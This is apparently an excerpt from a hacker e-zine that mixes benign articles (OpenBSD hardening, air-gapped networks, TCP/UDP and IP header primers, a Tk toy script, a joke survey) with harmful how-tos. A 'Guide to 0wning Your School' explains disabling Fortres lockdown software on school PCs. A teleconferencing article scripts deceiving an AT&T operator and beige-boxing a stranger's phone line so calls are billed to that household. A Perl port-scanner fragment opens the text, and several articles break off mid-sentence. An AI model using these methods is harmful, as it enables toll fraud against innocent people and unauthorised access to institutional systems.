$sock=IO::Socket::INET->new(PeerAddr=>$line, PeerPort=>$
port, Proto=>'tcp');
if($sock) {
$mult->print("Connected on Port $port");
} else {
#if you uncomment the next line.. you will have
a long long list of
#of on unopened port prints
#print("$port not open");
}
}
}
}
}
$host->close();
close($file1);
exit();
There you go.. this little simple script will open a file ping each ip in that
file then if the ip is alive it will portscan it to see what services are
there, and print every thing to a alive file and to stdout. I hope you
find it useful and helpful. enjoy...!!!
My next script will be a Perl/Tk varient of the one above. Maybe a few other
things as well. I also will be writing a few C programs, Tcl/Tk, vrml.
Who knows.. :-)
[Legions Survey]============================================[Gridmark/Phriction]
/* Editors Note: In spirit of such cool mags as Playboy or Cosmo, we have
decided to include a short survey of our readers. Feel free to cut and paste it,
fill out your answers and send it back to submit@legions.org... This should be
mighty interesting...
*/
Legions of the Underground member/regular/luser survey.
Legions Survey made possible because WGMATATS
Tip: if you dont answer all the questions you will be savagely beaten to a
bloody pulp by Gridmark and Phriction.
Thank you and Enjoy!
1. Do you know you know what WGMATATS stands for?
2. What is your favorite unsigned long int?
3. What is your handle?(alias,nickname,AKA)
4. What is the origin of your handle?(where did you get it from)
5. Who in legions do you think is the most likely to get arrested and for
what?
6. BeOS or MacOS?
7. touch or finger?
8. telnet or ssh?
9. Do most of the people you know refer to you by your handle?
10. What is your favorite protocol?
12. Favorite Daemon?
13. Usual bathroom reading?
14. Have you ever had sex with someone who could code Hello world in
assembly language?
15. Binary?
16. Do you own a pair of keys to a local ATM machine?
17. Do you know what a scenewhore is?
18. Are you one?
19. What must someone do to be elite?
20. Have you ever tried to nuke someone?
21. Do you have a root dance?
22. Have you ever owned a box stoned? or drunk?
23. Have you ever wrote root@127.0.0.1 as your address on a job application?
24. Have you ever rooted yourself?
25. Favorite book?
26. Favorite Car?
27. Favorite color?
28. Do you look at mullet porn?
29. Mountain Dew || Coffee?
30.
Multiple Choice Section
Just fill in the _'s with x's if you dont get it you suck.
Do you think this Survey is a threat to your security?
_[3y3 pj33r] _[no... dumbass]
Do you take large amounts of caffene and then lie about it the next day?
_[Admitted Addict.] _[no, and im stickin to it]
Do you have a 1Mbit+ connection running to your house?
_[yep] _[nien]
Do you have more than 10 computers in any one room of your house?
_[si] _[no]
Do you run around your house with a lampshade on your head sayin
"Hi! ima squid!"? _[yay] _[nay]
What are your "m4d sk1llz y0h"?
_[i r00t stuff] _[skript kid] _[clubie crackhead fucknut] _[whats a computer?]
What is your current rate of income?
_[Under 10,000] _[11,000+] _[50,000+]
_[100,000+] _[31,337] _[None of your fucking business Gridmark.]
How much time do you "use" playing games?
__[hrs]
Do you use 31337'isms?
_[y34 b1z47ch] _[No sir]
Do you have MtDew cans flying at your head blindingly fast? (i.e. commercial)
_[WATCH OUT!] _[whatchu talkin bout willis?]
Do you like me? _[i lub j00] _[fsck you bitch]
Are you a chick? _[yea baby] _[3y3 41nt gn0 ch1x0r]
*//////////////*
*/ Sorry, /*
How much do you like me? _[this is] _[getting tedious]
*/ I'm Lonley /*
*//////////////*
if [$lastquestion == yes]; then "can i r00t you?" _[no way in hell Gridmark.]
/* I'm Lonley /*
Sexiest stooge? Larry or Moe? _[larry] _[moe] _[shemp] _[nuyk nuyk]
Are you bored yet _[zzzzz] _[CMON MAN KEEP GOING]
Who selected the second answer to the last question? _[not me] _[not me]
EOF
[Guide to 0wning Your School]=========================================[Gridmark]
Homework, a Guide to 0wning your school
Chapter 1.
This text is for the kiddies, may god have mercy on your souls.
If your a CISCO router tech, than this is trivial bullshit.
But if you grew up like me, got a Tandy for your birthday 8 years ago and has
been hooked since. One that has used AOL and the like, One who thought
winnuke was cool at a time. But i have grown. I now know the wrongs I have
done. I now dedicate myself to the flow of information, for freedom and
truth against all forms of oppisition. but it dosent change the fact that
im a Lazy Sonnofabitch.
Well its September, the leaves are turning a nice orange/brown, and school
is in session. If you go to school, you should have computers in class,
and they plike to restrict your use of a computer. Like mabye web
filtering software. no mp3's for you, music disrupts the classroom.
and of course no pron when the teacher isn't looking, damn. well what are you
going to do about it? what about your access to local programs? no
solitare when your done with your work. no loading Quake III Arena and
fragging the shit outta Mike 3 classrooms away. Well this is a 4/5
part series on how to overcome these hurdles and do the unthinkable:
0wn your school.
Fortres x.x hole
Alot of the schools around here use compaqs, gateways, hp's, or dells. now
each of these PC's is out of the box a wonderful machine, but then the idiot
sysadmin goes and hand by hand installs a lockdown program, and now your
perfect box is trash, you can mabye do one or two things on this box now.
One such program is fortres. fortres is reletively easy to break.
Bootdisk.
Get a bootdisk from your box, make shure its clean. throw it in the target box,
unplug it if nessesacary (but a reboot will do just fine). boot the shit up
and delete the fortres directory. Btw attrib -h *.* will help you find the
directory, its usually hidden) reboot again and
your home free!
IE
Shitty old IE, whats it good for? breaking Fortres! if you can load up IE,
but instead of surfing over to slashdot type C:\ in the url bar, look at that,
the previously unaccessable directory listing! wilt full read/write! well the
first thing you would do is going to is tools>folder options>view>Hidden
files and folders>Show hidden files and folders. there you see the fortres
directory. wait you can delete it. you must rename it. easy shit. reboot.
(hammers work nicely for reboots)Lookie! no Fortres!
Right Click
It has come to my knowledge that Right clicking everything and executing
commands on icons etc. You can access and rename the fgc folder and gain
full access. I have not tested this method but it should work, they are
pretty dumb.
Thats it for now kids, stay tuned to Keen Veracity for more chapters!
[OpenBSD Security Overview]=========================================[David Jorm]
OpenBSD is often noted for its code auditing and integrated crypto, but the
security features go far beyond this. OpenBSD was built from the ground up
on the model of being a fabric woven with security in mind, not a
patchwork of bug fixes and security updates. This has led to OpenBSD
finally becoming recognised today for what it is; the most secure
operating system on earth. This article aims to illustrate these features
and provide practical examples of their implication on production
machines.
Encryption:>
One of the most astounding things about the information superhighway is the
number of people driving down it with their doors unlocked. Users and even
administrators still commonly employ systems where sensitive information
such as financial records and personal details are thrown over public
networks as clear text. This is largely due to the proliferation of
cleartext protocols such as telnet, rlogin and http. OpenBSD solves these
issues by containing encrypted replacements by default; OpenSSH and https
(OpenSSL) respectively. One of the first configuration tasks for an
OpenBSD administrator should be the correct setup of ssh and ssl to ensure
system security. OpenSSH is configured via two primary configuration, some
useful examples follow:
/etc/ssh_config (OpenSSH client configuration):
UseRsh no
FallBackToRsh no # OpenSSH will never fall back to the cleartest RSH protocol.
ForwardX11 no # Do not allow X windows forwarding through the SSH session.
/etc/sshd_config (OpenSSH server configuration):
Port 22
ListenAddress 0.0.0.0 # Listen on all active interfaces
HostKey /etc/ssh_host_key # Store the key in the default location
ServerKeyBits 1664 # Generate a 1664 bit key (stronger crypto than by default)
LoginGraceTime 600 # Allow 600 seconds for a client to login
KeyRegenerationInterval 3600 # Generate a new key every 3600 seconds (hourly)
PermitRootLogin no # Do not allow clients to login directly as root, must use
su
X11Forwarding no # Do not allow X windows forwarding through the SSH session.
PermitEmptyPasswords no # A password MUST be issued - no passwordless logins
allowed.
With SSH configured using these or similar options, the next step in enabling
OpenBSD crypto is to setup OpenSSL-based https. This is a good replacement
to cleartext http when sensitive information is being parsed through CGI
POSTs or similar methods. The official documentation for mod_ssl (located
by default in /var/www/htdocs/manual/mod/mod_ssl/ on OpenBSD
systems) provides more detailed configuration information, but the
process is 3 relative simple steps:
1. Generate a server key and self-signed x.509 certificate:
Generate a server.key:
$ openssl genrsa -des3 -out server.key 1024
Place this file in /etc/ssl
Generate a CSR (Certificate Signing Request):
$ openssl req -new -key server.key -out server.csr
Place this file in /etc/ssl
Generate an RSA key for your CA (Certifcate Authority):
$ openssl genrsa -des3 -out ca.key 1024
Place this file in /etc/ssl
Generate an x.509 certificate for your CA:
$ openssl req -new -x509 -days 365 -key ca.key -out ca.crt
Place this file in /etc/ssl
Sign your CSR:
$ ./sign.sh server.crt
sign.sh comes packaged with the OpenSSL source distribution.
2. Edit /var/www/httpd.conf:
In the main section:
<IfDefine SSL>
Listen 80
Listen 443
</IfDefine>
<IfDefine SSL>
AddType application/x-x509-ca-cert .crt
AddType application/x-pkcs7-crl .crl
</IfDefine>
A <VirtualHost> tag for your domain:
<VirtualHost _default_:443>
# General setup for the virtual host
DocumentRoot /home/www/vhost/www.mydomain.net/htdocs
ServerName www.mydomain.net
ServerAdmin admin@mydomain.net
ErrorLog logs/error_log
TransferLog logs/access_log
# SSL Engine Switch:
# Enable/Disable SSL for this virtual host.
SSLEngine on
SSLCertificateFile /etc/ssl/server.crt
SSLCertificateKeyFile /etc/ssl/server.key
</VirtualHost>
3. Edit /etc/rc.conf to enable https:
httpd_flags="-DSSL"
Code Auditing:</b>
One of the largest problems with systems such as Linux and FreeBSD is the
inclusion of unchecked third party software. If a vulnerability or
security issue arises, the third party must release a patch and the
operating system vendor must then redistribute this patch to their
users. Not only this, but the third party software used is not in any
way audited or checked for quality by the operating system vendors and as such
can be vulnerable for a long time before any sort of fix is available to
users (as happened numerous times with wu-ftpd). One of the major steps
forward for OpenBSD was when the entire source tree was audited for buffer
overflows and vulnerabilities. This has been constantly maintained and has
resulted in a product unparalleled in terms of security and system
integrity. In saying this, third party software is usually neccasary for
the operation of a functional system, so OpenBSD makes it available
via the ports tree; a mechanism for downloading installing and configuring
third party software known to work under OpenBSD, or modified to do so. I
won't go into details here of configuring the ports tree - this has been
broadly documented elsewhere.
Security Updates:
As opposed to the majority of commercial vendors and even some other open
source projects, OpenBSD takes a 'full disclosure' approach to any bugs or
vulnerabilities found in the source tree. This means that bugs are
reported immediately to users in their entirity, general with a patch or
workaround included. The outcome of this is a system with no hidden bugs
or 'features' shielded from the users, a prime example of this being the
+.htr bug recently in Microsoft IIS. Users wishing to monitor security updates
as they occur can subscribe to the security-announce mailing list, or
monitor the patches posted to the OpenBSD errata page. The patches
provided are generally a source tarball, which can be simply installed
over the top of an existing system. An example of this is the installation
of the recent ftpd remote-root exploit patch:
1. Download the patch:
# wget ftp://ftp.openbsd.org/pub/OpenBSD/patches/2.7/common/019_ftpd.patch
2. Place the patch in your source root directory (usr/src):
# mv 019_ftpd.patch /usr/src
3. Apply the patch to the source tree:
# patch -p0 < 019_ftpd.patch
4. Recompile ftpd:
# cd libexec/ftpd
# make obj && make depend && make && make install
5. Restart ftpd (which in this case has been started from inetd):
# ps aux | grep inetd
root 19983 0.0 0.4 72 264 ?? Ss 29May00 3:03.68 inetd
# kill -1 19983
As has been demonstrated, OpenBSD's "Secure by default" slogan holds merit in
all aspects of the system. Hopefully other open source projects (or dare I
suggest it; commercial vendors) will start to take onboard this wholistic
security approach to their own systems. Next week's article, which is the
final in the OpenBSD Explained Networking series, will look at the future
of OpenBSD Networking, examining developments such as ipv6 support, as
well as other possibilities for future releases.
[Air Gapped Networks]===================================================[dayzee]
Security standards often demand that a system be disconnected from all networks
before it can be given the highest security rating. Such pessimism seems
justified by the latest information security headlines; viruses, worms,
exploited vulnerabilities, denial-of-service attacks and Web site vandalisms
have left the impression that a connected machine is a vulnerable machine.
Unfortunately, cutting the connection ruins the quick and easy access to
back-office data systems and outside to the trusted perimeter. For example,
your typical e-commerce architecture includes client authentication,
inventory tracking and valuable credit card information, all of which must be
accessed by "the outside world" to complete a transaction.
Currently there are three main categories of gap technologies:
Real-Time Switch
================
In a real-time switch setup, two networks are physically disconnected but can
share data as if they were connected. This seems like a contradiction, but
by adding a gap device that send information back and forth between the two
networks it's very realistic. In this example, the gap device is a hardware
switch that can be physically connected to only one of the networks at a time.
In other words, the switch connects to one network, receives the data, switches
to the other network and sends the information onto it. This happens at
very high speeds, allowing for real-time operation.
----------------------------
| Untrusted Network |
----------------------------
|
------------
| Firewall | --------------------
------------ | Trusted Networks |
| --------------------
--------- |
| Switch |============
---------
Some of the problems surrounding real-time switch networks are per say just
a hardware switch is not enough since attacks could be sent into the
secure network and then vital information sent to the untrusted network.
Since the headers are in "raw" format, this prevents risk of exploitation
based on the networks protocol weaknesses.
A real-time switch is physically connected to only one network at a time.
After data is received from the untrusted network to the switch, the
network connection is terminated and the TCP header information
is stripped out. Then, the "raw" data is sent to the trusted network.
One-Way Link
============
With a one-way link, data is sent from in one direction, from the source to
the destination network. This creates a read-only network connection.
This one is pretty much self-explanatory. It creates essentially a "read-only"
network connection, which doesn't allow data to be sent back to the trusted
network. As in the real-time setup, the one-way link also is implemented
with hardware that prevents data from going the wrong way. This one seems
more practical for sending data to web servers or online orders, helping
prevent vital information getting out.
--------------------- ---------- -----------------------
| Source Network |========| Switch |=========| Destination Network |
--------------------- ---------- -----------------------
Network Switcher
================
A network switcher card has dual interfaces connected to separate networks,
only one of which is active at any given time. All system resources are
segmented between the two interfaces, with none shared.
A network switcher is simply an implementation of a card with dual faces.
Each interface is connected to a different network with only one active at
a time. A correct implantation will segment all system resources, assigning
some to each interface, with none belonging to both. Doing this, storage that
is assigned to one network is never accessible to the other, meaning none
of the information can be shared or viewed by the other network.
There are a few networks using this type of gap technology, e-Gap from Whale
Communications (www.whalecommunications.com), AirGap from Spearhead Technologies
(www.spearheadtechnologies.com). The product offered by each company is a
different solution with their own technology, which you can read more about at
their website.
-------------- -------------
| Network 1 | | Network 2 |
-------------- -------------
| ===Single Physical System== |
=========== | ------------------ |============|
| | dual interface | |
| | card | |
| ------------------ |
| ------------------- |
| | virtual|| virtual| |
| | system || system | |
| | 1 || 2 | |
| -------------------- |
============================
Sept 6, 2000, dayzee@madsekci.net
[TKblink]==============================================================[clocker]
#!/usr/bin/wish
# list of colors to use.
set colorlist "red blue green yellow white black cyan magenta brown turquoise
lightcyan lightblue darkblue darkcyan purple orange"
# number of columns.
set col 10
# number of rows.
set row 10
# number of milliseconds between light changes.
set secsChange 125
# --- DON'T PLAY AROUND AFTER THIS LINE. --- #
# Set the window title.
wm title . TkBlinkenLights
# Set the current column and row to render
set cntCol 1
set cntRow 1
# dynamically create the grid of lights.
# start the loop for rows
while {$row >= $cntRow} {
# create a frame for the row
frame .f${cntRow}
# render the frame for the row
pack .f${cntRow}
# start a loop for the buttons
while {$col >= $cntCol} {
# create the current button
button .f${cntRow}.b${cntCol}
# render the current button
pack .f${cntRow}.b${cntCol} -side left -in .f${cntRow}
incr cntCol
}
set cntCol 1
incr cntRow
}
# draw exit button.
frame .exit
pack .exit
button .exit.b1 -text exit
pack .exit.b1 -side left -in .exit
# bind exit button.
set exit 0
.exit.b1 configure -command "exit"
# Start changing colors.
# Don't worry about the infinite loop, that's what the "exit" button is there
# for.
proc doColorChange {} {
global col row secsChange
set randCol 0
set randRow 0
# get random numbers for the column and row to change
while {$randCol == 0} { set randCol [expr round(rand() * 1000000) % $col +
1] }
while {$randRow == 0} { set randRow [expr round(rand() * 1000000) % $row +
1] }
# change the color
.f${randRow}.b${randCol} configure -background [randcolor]
.f${randRow}.b${randCol} configure -activebackground [randcolor]
# after a specific amount of time, start this process again
after $secsChange {doColorChange}
}
# process to get a random color
proc randcolor {} {
global colorlist
return [lindex $colorlist [expr round(rand() * 1000000) % [llength
$colorlist]]]
}
# start changing the colors, beeotch!
doColorChange
# Oh yeah, and uh, i guess this code is under the GNU GPL.
# Don't like it? Fuck you, because i don't give a shit about you. Ungrateful
bastard.
[TCP/UDP]===============================================================[dayzee]
TCP (Transmission Control Protocol) and UDP (User Datagram Protocol).
=====================================================================
Ports
=====
What is a port? A TCP and UDP port is what is used by the internet
server to distinguish between requests for different services. For
example telnet runs on port 23, while a web server listens on TCP port 80.
Here are some services and the ports they run on, you can also look on
your computer in /etc/services:
echo 7/tcp Echo
systat 11/tcp Users
ftp-data 20/tcp File Transfer [Default Data]
ftp-data 20/udp File Transfer [Default Data]
ssh 22/tcp secure shell
ssh 22/udp secure shell
telnet 23/tcp Telnet
telnet 23/udp Telnet
smtp 25/tcp Simple Mail Transfer
smtp 25/udp Simple Mail Transfer
nameserver 42/tcp Host Name Server
nameserver 42/udp Host Name Server
finger 79/tcp Finger
finger 79/udp Finger
www-http 80/tcp World Wide Web HTTP
www-http 80/udp World Wide Web HTTP
kerberos 88/tcp Kerberos
kerberos 88/udp Kerberos
hostname 101/tcp NIC Host Name Server
hostname 101/udp NIC Host Name Server
pop3 110/tcp Post Office Protocol - Version 3
pop3 110/udp Post Office Protocol - Version 3
auth 113/tcp Authentication Service
auth 113/udp Authentication Service
imap2 143/tcp Interim Mail Access Protocol v2
imap2 143/udp Interim Mail Access Protocol v2
syslog 514/udp System Log
route 520/udp Router Routed
whoami 565/udp whoami
TCP
===
TCP (RFC 793) (Transmission Control Protocol) is a communication method
(protocol) used along with internet protocol (IP) to send data in the form
of data from computer to computer over an internet connection. While
internet protocol takes care of handling the actual sending of the data,
TCP takes care of keeping track of each packet that a message is divided
into for efficient routing through the internet. For example, when you
download a kernel, the TCP layer of the host divides the kernel into one or
more packets, number the packets, and forwards them to the client.
Although each packet has the same destination IP address, it may get
routed differently through the network. At the other end, the TCP layer
reassembles the packets and waits until they all arrive to forward them to
you as a single file.
TCP is known as the connection-oriented protocol, which means the
connection is established and will stay connected until all the packets
have been sent and received. TCP is responsible for making sure a file is
divided into packets that the IP manages for reassembling the packets into
the actual file that was downloaded at the other end. In the OSI layer,
the TCP is in layer four, also known as the transportation layer.
TCP Header
|-------------------------------|---------------------------|
| source port | destination port |
|-------------------------------|---------------------------|
| sequence number |
|-----------------------------------------------------------|
| acknowledgement number |
|-----------------------------------------------------------|
| data offset| reserved | flags | window |
|-----------------------------------------------------------|
| checksum | urgent pointer |
|-----------------------------------------------------------|
| options (+ padding) |
|-----------------------------------------------------------|
| data (variable) |
|-----------------------------------------------------------|
UDP
===
UDP (RFC 768) is a communications method (protocol) that offers a limited
amount of service when messages are exchanged between computers in a
network that uses the internet protocol. UDP is an alternative to the
transmission control protocol (TCP) and, together with IP, is sometimes
referred to as UDP/IP. Like TCP, UDP uses the internet protocol to send a
datagram from one computer to another. Unlike TCP, UDP does not allow one
to divide a message into packets and reassemble them at the other end.
So, when a datagram is being send that is using UDP, it must arrive at the
other computer in full and in the same order it was sent. Network
applications that want to save processing time because they have very
small data units to exchange may prefer UDP to TCP.
UDP provides two services not provided by the IP layer. It provides port
numbers to help distinguish different user requests and, optionally, a
checksum capability to verify that the data arrived intact. In the OSI
layer, UDP, like TCP, is in layer four, the transportation layer.
UDP Header
<-------------------------32 bits---------------------->
|------------------------------------------------------|
| Source Port | Destination Port |
|-----------------------------|------------------------|
| Length | Checksum |
|------------------------------------------------------|
dayzee - dayzee@stupidphat.com, October 1999
[Teleconferencing]=======================================================[Vixen]
Let me start this off by saying, half of you probably already know how to do
this. I am writing this only because people are still asking all the time
how to set up teleconferences, or they say that they won't set one up
because "they don't know how". I know I could easily refer them to the
SysFail article about this, but for some reason that never seems to
work. People just keep bugging me about it. So, in this article I will go
over two ways of starting a teleconference.
METHOD ONE: Your Friendly Neighborhood COCOT. First, find a COCOT
Payphone. COCOT stands for Customer Owned Coin Operated Telephone. What the
hell does that mean? Well, it means that it's a payphone that is owned or
rented by some customer of the telephone company. It won't have a Bell or
GTE logo on it or anything.
The telephone line is a normal customer loop, instead of a special payphone
loop that normal payphones are on that allow certain tones to go through
when you put in your change (yeah, the red box tones). So you won't be
able to get free calls by redboxing this thing, but there are still ways
to fuck with it.....
Now, go find one. Good, now that you've found one, dial 1-800-232-1234. An
operator will pick up and you should have a conversation similar to this
(note: individual conversations may vary):
OPER: AT&T Teleconferencing, may I help you?
YOU: Can you setup a teleconference for me?
OPER: Yes, have you ever used the service before?
YOU: No, you stupid bitch, I haven't.
OPER: Okay, can I get your name?
YOU: Yes, *name goes here*, and I'm with *random company*.
OPER: Okay, let me setup a folder for you.... Okay your folder ID is xxxxx,
now, can I have the name and number of all the participants?
YOU: No, fucking whore, I want a dial-in.
OPER: Okay, how many participants [OR:] how many ports? [both are the same]
YOU: 15
OPER: Would you like that to auto-extend?
YOU: Sure, that would be swell!
OPER: When do you want this for?
YOU: *anytime you want the conf up*
OPER: Today?
YOU: Yes, fucking moron!
OPER: Duration?
YOU: 3 hours, wait - no, no, 3 and a half hours!
OPER: Can I have the number to your location?
YOU: [give her the number of the COCOT payphone you are at]
OPER: Alright, I'll call you back with the host and participant pins
YOU: Gee-golly! that's great!
At this point you will both hang up and you will snicker about the whole
episode. But you're not done yet.... wait about 5 minutes....
Ring Ring Ring..... Ring Ring Ring, etc....
YOU: *random company you chose* this is *name you chose* how may i help you?
OPER: Hello,Sarah with AT&T Teleconferencing
YOU: It's about fucking time!
OPER: Your 888 number is 888-422-7128. Your host pin is 738846. Your guest
pin is 539427
YOU: Alright, let me verify those numbers. 800-422-7128. Host 738846 and
user 539427?
OPER: Yes, have a nice day. Thank you for using AT&T
You both hang up, and you go tell all your IRC friends about the conf. Good
thing you wrote that 888 number and those pin numbers down! Oh... you
didn't? Erm.... you better go back to that COCOT and repeat all of
this. Just remember to write everything down this time. By the way, the
reason you say you are from a business. is because COCOTs
are on a business line, and the operator thinks you are calling from a
business.
METHOD TWO: Beige Boxing Your Way To Fame
First, get a notepad and a pen. Now get your beige box. Now get an ANI
number. Getting an ANI number is very important. Test the ANI number
before you go. Now, find a house to beige box. Call the ANI number and
write down the number of the house. Now, call 1-800-232-1234 and have the
same conversation you would have if you were using method one, EXCEPT,
don't pretend to be a business. When the operator asks for
the number you are calling from, give them the number of the house (that is
what the ANI thing was about. See? It _was_ important!). Just be a normal
person like you are calling from your own house. Now, when AT&T calls you
back, write down the info and go home.
Remember (for BOTH methods):
Set up the teleconference to run PAST 12:30 AM! This way, even if you say
you want the conference to end at 1:30 AM, it will automatically go on
until 7:00 AM.
IMPORTANT:
Do _NOT_ use the Host pin from your house! They might back charge you for
[TCP IP Datagrams Explained]============================================[vortek]
Greetings Impiety
"... of Belial, the wicked one; children of darkness. be impious..."
Im writing this article to clarify a few things. There is a problem
out there, This problem is changing the undernet as we know it.
The problem, EXCESS LAMERS! Guys We need to set some ethics, Some
standards for these new scholar's. That is why I'm writing this article.
There are to many stupid @ss9 dosers out there and script kiddies,
They don't even understand the protocol that they so much ride on.
Let alone how the bloody h4x0r.c travels to its destination point. :D
This article will explain the Ip datagram and all of its options, also it
will clarify how they affect the way your Ip Datagram travels. This article
will not be TO advanced. But It will teach you enough to understand whuts
going on.
Knowledge puffeth up, but charity edifieth. --1 Cor. viii. 1. "BIBLE!!"
Ok Im gonna start out with the Basic lay out of an Ip Datagram.
Yes I stole this leet ASCII art from a RFC I didn't feel like playing ASCII
art kiddie to create it.
Example * =(The first column #1 second column #2 = 12'th bit)
(The first column then slide # up from second aka 12)
0 1 * 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|Version| IHL |Type of Service| Total Length |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Identification |Flags| Fragment Offset |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Time to Live | Protocol | Header Checksum |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Address |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Destination Address |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Options | Padding |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Ok An Ip Datagram Is made of 6 layers, 0 to 31 bits.
Each field tells us whut version, type how to send etc. We will start
With the First field first option. This Is called the Version Field.
Since this packet is assumed to be sent on a standard network well base this
datagram on IPV4. "cd /proc/sys/net/ipv4/" If your smart and run linux.
<<VERSION FIELD 0-4 BITS>> Some times referred to as VERS
The Version field tells us the ip protocol version. It occupies the first
field from 0 to 4 bits. Now this field tells that this ipdatagram is using
ipv4, Ip version 4. To find out more about IPV4 consult your local rfc's.
<<Ip Header Lenght "IHL" 4-8 BITS>> Some times referred to as HLEN
This field tells us the total lenght of the header composed in 32 bit words.
The defualt value is normaly 5 cause you hardly use any options in this
field. Now since this is a 4 bit field you are limited to a header size of
60 bytes. Now this cripple's some options "Like record route option" but
who cares. Now you can do very leet things with this field, Things like
this are best when found on your own. But lets just say you can by-pass
packet filters and be very sneaky about your data transfers. Be lucky I
told you that.
<<Type Of Service 8-16 BITS>> Some times referred to as T.O.S.
Now this is one of my favorite fields cause it controls how the packet is
sent in transit. Now this field is fubar also cuase the 3 bit precedence
field isn't used no more. So were gona focus on the T.O.S. bits, Yes there
are 4. These fields are as fallows.
0 1 2 3 4 5 6 7 8 ASCII ART STOLEN
+-----+-----+-----+-----+-----+-----+-----+-----+ AGAIN "IM LAZY!"
| | | | | | |
| PRECEDENCE | D | T | R | 0 | 0 |
| | | | | | |
+-----+-----+-----+-----+-----+-----+-----+-----+
D: Ok bit 3 the Big D, "Delay" You have 2 options for all these Bits.
You put a "0" in this field if you want normal Delay. 1 for low Delay.
T: Bit 4 is the "Throughput" The Big T,
You put a 0 for normal a 0 for normal throughput a 1 for high throughput.
R: Bit 5 is the rascaly R, "Reliability" 0 for normal reliability 1 for
high.
The last fields are reserved for future use unless your mocking around
with an experimental protocol.
Now the values here will show up in hex for tcpdump. Tos affects a lot more
things then what I described here and goes on to many more levals. This is
just the basics for you to understand what's goind on.
Lots of dos programs play with this.
<<Total Lenght 16-31>> "Actualy 16-30" Total packet Lenght
Now this field composes the total lenght from the Ip Header of the
datagram and the total datagram lenght. The maximum size of this field is
65535 bytes. If this field is bigger then whut the router our host will
accept prepair to be fragmented. More on that later. We can also use this
field to tell were the data portion of the of the Ip Datagram starts and its
lenght. Usualy this field is most used by data links aka Ethernet to solve
some minor problems.
On to the second layer. You guys still with me? Hang In there It will all
add up soon.
<<Identificaton 0-16>>
This field is just a simple 16 bit field. This field just assigns a number
to each each datagram for reasembly upon fragmentation. In other words all
the fragmentation from datagram foo will have the exact same Identification
number. The kernel usualy increments a variable for each datagram upon
assigning the value. Basicly it assigns a new ID to each datagram.
<<Flags 16-19>>
This field controlls the fragmentation values of the packet.
Fragmentation is basicly when you break a data gram into little chunks
and assemble them again at the other end. Kinda like how they took apart
that bridge some where in history. They gave each brick a number, took it
apart. Then they moved the bridge brick by birck to the new home and putt
all the bricks back togather. The bridge was to big to move as a whole so
they moved it brick by brick "fragments" and put it all back the way it was
at the new location.
0 1 2
+---+---+---+
| | D | M |
| 0 | F | F |
+---+---+---+
Thats whut the flag portion of the second layer looks like. It 3 bits.
The first field is reserved for those men waling around in black coats
our something. So we will focus on bit 1 and 2. This is rather simple here.
The second bit. "1"
DF: "Don't Fragment" 0 in this bit means let it be fragmented 1 means do not
allow fragmentation.
The third bit "2"
MF: "More Fragments" 0 in this bit signals that this is the last fragment in
this Datagram. And 1 tells us that there are more fragments.
This field is also used by dosers who think there a big man cause they can
run hack.c root a oc3 and type ping -f, Let alone some use terminals at MIT,
Yeah bitch you know who I am talking about. Note this requires NO SKILL whut
SO EVER. If you wan't to make an impact root there host j/k our just plain
skewl them wich is also lame, But it shows us you got more brains then
the avarage antionline.com junkie.
<<Fragment Offsett 16-31>>
This field is realy simple. It just tells us were the fragments of the
datagram belong, To aid in assembly. This value is the measured in values
of 64 bits. I wont go en depth in this field cause its usualy useless to
hacking. USUALLY ;)
Now we move onto the third layer.
<<Time To Live 0-8>> TTL
This is the time in seconds that a DataGram can travel. Usualy tis is 64
our 32. Now this is susposed to be measured in seconds but in reality every
time your datagram goes through a router it takes 1 away from it. When this
value reaches 0 the datagram is killed. And you get a ICMP msg. Suspose I
sent a datagram to your host. It took 3 hops to get to your host.
So you will have to take that into acount when figuring out my operating
systems
Defualt TTL.
<<Protocol 8-16>>
This is just a simple value that lets us know whut protocol to use to
deliver the datagram. Im just gona give you some basic options here.
1 Internet Control Message Protocol (ICMP)
2 Internet Group Management Protocol (IGMP)
6 Transmission Control (TCP)
17 User Datagram (UDP)
Im not gona go in depth on this one either cause its rather simple.
But if you'd like more information start from rfc 1010.
This Field has a Ton of uses Dos hacking forging packets. ETC.
<<Header Checksum 16-31>>
Well since this isn't a perfect world you need this field, Because from what I
explained earlier is that the ttl value is gona change with each hop, So
you are going to have to recompute the vaulue at EACH hop.
I suck at math so Im gona take whut another pro in this field said,
"For purposes of computing the checksum, the value of the checksum field is
zero. (At least, according to rfc 791). My interpretation: one's complement
each sixteen bit word in the header, add all these quantities (drop carries)
and then one's complement that sum." He explained it more laymans terms then
I could for ya. In other words if the host receives all 1's it accepts the
packets, If not It says uhm something is wrong and discards the packet, DO
not pass go do not collect a hundred dollars let the higher layers send you
the error. Note that the Ip header has its own checksum. All you need to
know now is that TCP UDP etc all use the same checksum algorithm.
Next layer
<<Source IP Adress 0-31>> src
32 bit address goes here, Usualy you see them as Quaded dotted-decimal notation.
123.456.789.255 now that address isnt real but you get the point.
Uses for this field are conectionless spoofing.
Usualy used for dosing. But there are some things you can do with this to
evade packet filters but its much more harder then changing this field.
Next layer
<<Destination Ip Adress 0-31>> dst
This is just the 32 bit destination address nothing complicated here.
Uses dosing servers mucking around with name servers, And servers in
general. Playing with subnets.
<<Ip options If any 0-24>>
This field is variable lenght optional variables for the datagram.
Security handling restrictions mainly used by the military "RFC 1108."
+--------------+-----------+-------------+-------------//----------+
| 10000010 | XXXXXXXX | "Top Secret"| AAAAAAA[1] AAAAAAA0 |
| | | 11011110 | [0] |
+--------------+-----------+-------------+-------------//----------+
TYPE = 130 LENGTH CLASSIFICATION PROTECTION
VARIABLE PROTECTION AUTHORITY
LEVEL FLAGS
This is just a basic layout If I were to cover this It would have to be
